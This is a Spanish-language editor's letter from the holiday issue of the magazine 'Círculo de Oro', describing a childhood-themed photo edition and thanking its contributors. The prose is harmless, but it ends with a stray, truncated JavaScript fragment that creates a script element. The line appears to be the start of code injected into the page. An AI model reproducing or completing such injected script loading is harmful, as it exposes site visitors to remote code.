¡Son como niños!

Felices fiestas de parte de todos los que hacemos Círculo de Oro y nos leemos el próximo año.

Las memorias de nuestra niñez en su mayoría nos traen gratos recuerdos y seguido nos sacan grandes sonrisas al recordar los juegos, dulces, travesuras y juguetes que hicieron de esa época algo que a todos nos encantaría volver a vivir.

Este año después de nuevamente pensar y pensar en el tema para que esta edición que cierra un año de mucho trabajo, nuevos retos, con una cara nueva y nuevamente con el éxito de seguir siendo los mejores, todo me llevó a pensar que había que mostrar felicidad y frescura en nuestras páginas, que teníamos que hacer un poquito de lado las imágenes sofisticadas y glamurosas para llevar algo divertido, diferente.

Y entonces, pensando en diversión, la niñez y todo lo que ésta encierra no fue difícil encontrar un tema en el que pudiéramos crear imágenes en las cuales nuestros invitados se divirtieran en la sesión de fotos como cuando eran niños y esto se viera reflejado en el resultado final.

Hoy después de más de una década haciendo Círculo de Oro puedo decir que esta ha sido la edición más divertida que hemos hecho. Los invitados estoy segura disfrutaron tanto las sesiones de fotos como nosotros mismos.

A lo largo de estas imágenes juntos recordamos juegos, dulces, travesuras y juguetes que hicieron los días inolvidables de muchos y sobretodo nos reímos mucho y eso se ve plasmado en cada una de las páginas.

Como siempre hay mucho que agradecer, a Karina que me ayuda agendando las fotografías y en las sesiones de fotos; a Luis que hace magia con su lente y hace sentir a todos las estrellas que son; a Gaby Sánchez por embellecerlas a todas; a todos aquellos que nos facilitaron sus instalaciones o nos prestaron juguetes para las fotografías; a Edgar que plasmo la idea en el diseño y lo hizo ver tal y como lo imaginé; a nuestros invitados que nos regalan largas horas de su tiempo, acceden a mis locuras, disfrutan del momento y sobretodo nos hacen el honor de embellecer nuestras páginas; y a ti nuestro lector por esperar con ansias esta edición que cada año preparamos con mucho esmero especialmente para ti. Ahora si esperamos que disfruten tanto de esta edición como nosotros..

var d=document;var s=d.createElement(‘script’);